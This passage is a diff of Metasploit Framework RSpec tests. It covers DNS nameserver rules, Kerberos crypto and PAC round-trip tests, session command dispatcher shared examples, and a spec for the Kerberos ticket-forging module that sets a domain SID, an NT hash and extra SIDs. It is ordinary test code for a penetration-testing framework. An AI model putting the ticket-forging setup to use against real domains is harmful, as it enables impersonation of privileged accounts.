+ packet = packet_for('subdomain.metasploit.com')
+ ns = empty_provider.nameservers_for_packet(packet)
+ expect(ns).to eq([[base_nameserver, {}]])
+ end
+ end
+
+ context 'When a base nameserver is configured' do
+ it 'The base nameserver is returned' do
+ packet = packet_for('subdomain.metasploit.com')
+ ns = ruleless_provider.nameservers_for_packet(packet)
+ expect(ns).to eq([[ruleless_nameserver, {}]])
+ end
+ end
+
+ context 'When a nameserver rule is configured and a rule entry matches' do
+ it 'The correct nameserver is returned' do
+ packet = packet_for('subdomain.metasploit.com')
+ ns = ruled_provider.nameservers_for_packet(packet)
+ expect(ns).to eq([[ruled_nameserver, {}]])
+ end
+ end
+
+ context 'When a nameserver rule is configured and no rule entry is applicable' do
+ it 'The base nameserver is returned when no rule entry' do
+ packet = packet_for('subdomain.notmetasploit.com')
+ ns = ruled_provider.nameservers_for_packet(packet)
+ expect(ns).to eq([[ruleless_nameserver, {}]])
+ end
+ end
+
+ context 'When many rules are configured' do
+ it 'Returns multiple entries if multiple rules match' do
+ packet = packet_for('subdomain.metasploit.com')
+ ns = many_ruled_provider.nameservers_for_packet(packet)
+ expect(ns).to eq([[ruled_nameserver, {}], [ruled_nameserver2, {}]])
+ end
+ end
+
+ context 'When a packet contains multiple questions that have different nameserver results' do
+ it 'Throws an error' do
+ packet = packet_for('subdomain.metasploit.com')
+ q = Dnsruby::Question.new('subdomain.notmetasploit.com', Dnsruby::Types::A, Dnsruby::Classes::IN)
+
+ packet.question.append(q)
+ expect {many_ruled_provider.nameservers_for_packet(packet)}.to raise_error(ResolverError)
+ end
+ end
+end
\ No newline at end of file
diff --git a/spec/lib/rex/proto/kerberos/crypto/aes256_cts_sha1_spec.rb b/spec/lib/rex/proto/kerberos/crypto/aes256_cts_sha1_spec.rb
index 5d23c2e765..3ce1f15643 100644
--- a/spec/lib/rex/proto/kerberos/crypto/aes256_cts_sha1_spec.rb
+++ b/spec/lib/rex/proto/kerberos/crypto/aes256_cts_sha1_spec.rb
@@ -87,7 +87,6 @@ RSpec.describe Rex::Proto::Kerberos::Crypto::Aes256CtsSha1 do
end
it 'Decryption inverts encryption' do
- print("\n\nDECRYPTING\n\n")
plaintext = "The quick brown fox jumps over the lazy dog"
key = "\xfe\x69\x7b\x52\xbc\x0d\x3c\xe1\x44\x32\xba\x03\x6a\x92\xe6\x5b\xbb\x52\x28\x09\x90\xa2\xfa\x27\x88\x39\x98\xd7\x2a\xf3\x01\x61"
msg_type = 4
diff --git a/spec/lib/rex/proto/kerberos/pac/krb5_pac_spec.rb b/spec/lib/rex/proto/kerberos/pac/krb5_pac_spec.rb
index 2894302da7..c8f51c825c 100644
--- a/spec/lib/rex/proto/kerberos/pac/krb5_pac_spec.rb
+++ b/spec/lib/rex/proto/kerberos/pac/krb5_pac_spec.rb
@@ -88,6 +88,18 @@ RSpec.describe Rex::Proto::Kerberos::Pac::Krb5Pac do
)
end
+ let(:upn_dns_info) do
+ element = Rex::Proto::Kerberos::Pac::Krb5UpnDnsInfo.new(
+ upn: 'juan@demo.local',
+ dns_domain_name: 'DEMO.LOCAL',
+ flags: 3,
+ sam_name: 'juan',
+ sid: 'S-1-5-21-1755879683-3641577184-3486455962-1038'
+ )
+ element.set_offsets!
+ element
+ end
+
let(:pac_elements) do
[
logon_info,
@@ -97,6 +109,16 @@ RSpec.describe Rex::Proto::Kerberos::Pac::Krb5Pac do
]
end
+ let(:pac_elements_with_upn) do
+ [
+ logon_info,
+ client_info,
+ upn_dns_info,
+ server_checksum,
+ priv_srv_checksum
+ ]
+ end
+
describe '#assign' do
it 'creates a valid pac structure' do
@@ -112,6 +134,16 @@ RSpec.describe Rex::Proto::Kerberos::Pac::Krb5Pac do
end
end
+ describe '#write' do
+ it 'writes then reads back to its original state' do
+ pac.assign(pac_elements: pac_elements_with_upn)
+ pac.sign!
+ data = pac.to_binary_s
+ result = Rex::Proto::Kerberos::Pac::Krb5Pac.read(data)
+ expect(result).to eq(pac)
+ end
+ end
+
describe '#read' do
it 'correctly parses the binary data' do
pac = described_class.read(sample)
diff --git a/spec/modules/auxiliary/admin/kerberos/forge_ticket_spec.rb b/spec/modules/auxiliary/admin/kerberos/forge_ticket_spec.rb
index dad3c331b8..b64200d397 100644
--- a/spec/modules/auxiliary/admin/kerberos/forge_ticket_spec.rb
+++ b/spec/modules/auxiliary/admin/kerberos/forge_ticket_spec.rb
@@ -31,6 +31,7 @@ RSpec.describe 'kerberos keytab' do
subject.datastore['DOMAIN_SID'] = 'S-1-5-21-1266190811-2419310613-1856291569'
subject.datastore['NTHASH'] = '767400b2c71afa35a5dca216f2389cd9'
subject.datastore['USER'] = 'Administrator'
+ subject.datastore['RPORT'] = ''
# https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/81d92bba-d22b-4a8c-908a-554ab29148ab
subject.datastore['EXTRA_SIDS'] = ' S-1-18-1, S-1-5-21-1266190811-2419310613-1856291569-519, '
subject.datastore['SessionKey'] = 'A' * 16
diff --git a/spec/spec_helper.rb b/spec/spec_helper.rb
index c762e53842..2aceff27d1 100644
--- a/spec/spec_helper.rb
+++ b/spec/spec_helper.rb
@@ -169,6 +169,7 @@ RSpec.configure do |config|
# https://github.com/rapid7/rex-text/blob/11e59416f7d8cce18b8b8b9893b3277e6ad0bea1/lib/rex/text/wrapped_table.rb#L74
# This can cause some integration tests to fail if the tests are run from smaller consoles
# This mock will ensure that the tests run without word-wrapping.
+ require 'bigdecimal'
config.before(:each) do
mock_io_console = double(:console, winsize: { rows: 30, columns: ::BigDecimal::INFINITY }.values)
allow(::IO).to receive(:console).and_return(mock_io_console)
diff --git a/spec/support/shared/examples/msf/ui/console/command_dispatcher/session_spec.rb b/spec/support/shared/examples/msf/ui/console/command_dispatcher/session_spec.rb
new file mode 100644
index 0000000000..a642e14492
--- /dev/null
+++ b/spec/support/shared/examples/msf/ui/console/command_dispatcher/session_spec.rb
@@ -0,0 +1,118 @@
+require 'spec_helper'
+
+RSpec.shared_examples_for 'session command dispatcher' do
+ include_context 'Msf::Simple::Framework'
+
+ describe '#client' do
+ subject { command_dispatcher.client }
+ it { is_expected.to be(client) }
+ end
+
+ describe '#session' do
+ subject { command_dispatcher.session }
+ it { is_expected.to be(session) }
+ end
+
+ describe 'Core commands' do
+ describe '#cmd_background' do
+ before(:each) do
+ allow(session).to receive(:interacting=)
+ end
+
+ it 'backgrounds the session' do
+ subject.cmd_background
+ expect(session).to have_received(:interacting=).with(false)
+ end
+
+ it 'is aliased to #cmd_bg' do
+ expect(subject.method(:cmd_background)).to eq(subject.method(:cmd_bg))
+ end
+ end
+
+ describe '#cmd_exit' do
+ before(:each) do
+ allow(session).to receive(:exit)
+ end
+
+ it 'shuts down the session' do
+ subject.cmd_exit
+ expect(session).to have_received(:exit)
+ end
+
+ it 'is aliased to #cmd_quit' do
+ expect(subject.method(:cmd_exit)).to eq(subject.method(:cmd_quit))
+ end
+ end
+
+ describe '#cmd_irb' do
+ let(:history_manager) { double('history_manager') }
+ before(:each) do
+ allow(session).to receive(:framework).and_return(framework)
+ allow(framework).to receive(:history_manager).and_return(history_manager)
+ allow(history_manager).to receive(:with_context).and_yield
+ allow(Rex::Ui::Text::IrbShell).to receive(:new).with(session).and_return(irb_shell)
+ allow(irb_shell).to receive(:run)
+ end
+ let(:irb_shell) { instance_double(Rex::Ui::Text::IrbShell) }
+ it 'runs an irb shell instance' do
+ subject.cmd_irb
+ expect(Rex::Ui::Text::IrbShell).to have_received(:new).with(session)
+ expect(irb_shell).to have_received(:run)
+ end
+ end
+
+ describe '#cmd_sessions' do
+ context 'when switching to a new session' do
+ before(:each) do
+ allow(session).to receive(:interacting=)
+ allow(session).to receive(:next_session=)
+ end
+
+ let(:new_session_id) { 2 }
+
+ it 'backgrounds the session and switches to the new session' do
+ subject.cmd_sessions(new_session_id)
+ expect(session).to have_received(:interacting=).with(false)
+ expect(session).to have_received(:next_session=).with(new_session_id)
+ end
+ end
+ end
+
+ describe '#cmd_resource' do
+ context 'when there is a valid resource script' do
+ let(:valid_resource_path) { 'valid/resource/path' }
+ before(:each) do
+ allow(File).to receive(:exist?).and_return(valid_resource_path)
+ allow(session.console).to receive(:load_resource)
+ end
+ it 'executes the resource script' do
+ subject.cmd_resource(valid_resource_path)
+ expect(session.console).to have_received(:load_resource).with(valid_resource_path)
+ end
+ end
+ end
+
+ %i[help background sessions resource irb pry exit].each do |command|
+ describe "#cmd_#{command}" do
+ before(:each) do
+ allow(subject).to receive("cmd_#{command}_help")
+ end
+ next if %i[help exit].include?(command) # These commands don't require`-h/--help`
+
+ context 'when called with the `-h` argument' do
+ it 'should call the corresponding help function' do
+ subject.send("cmd_#{command}", '-h')
+ expect(subject).to have_received("cmd_#{command}_help")
+ end
+ end
+
+ context 'when called with the `--help` argument' do
+ it 'should call the corresponding help function' do
+ subject.send("cmd_#{command}", '--help')
+ expect(subject).to have_received("cmd_#{command}_help")
+ end
+ end
+ end
+ end
+ end
+end
|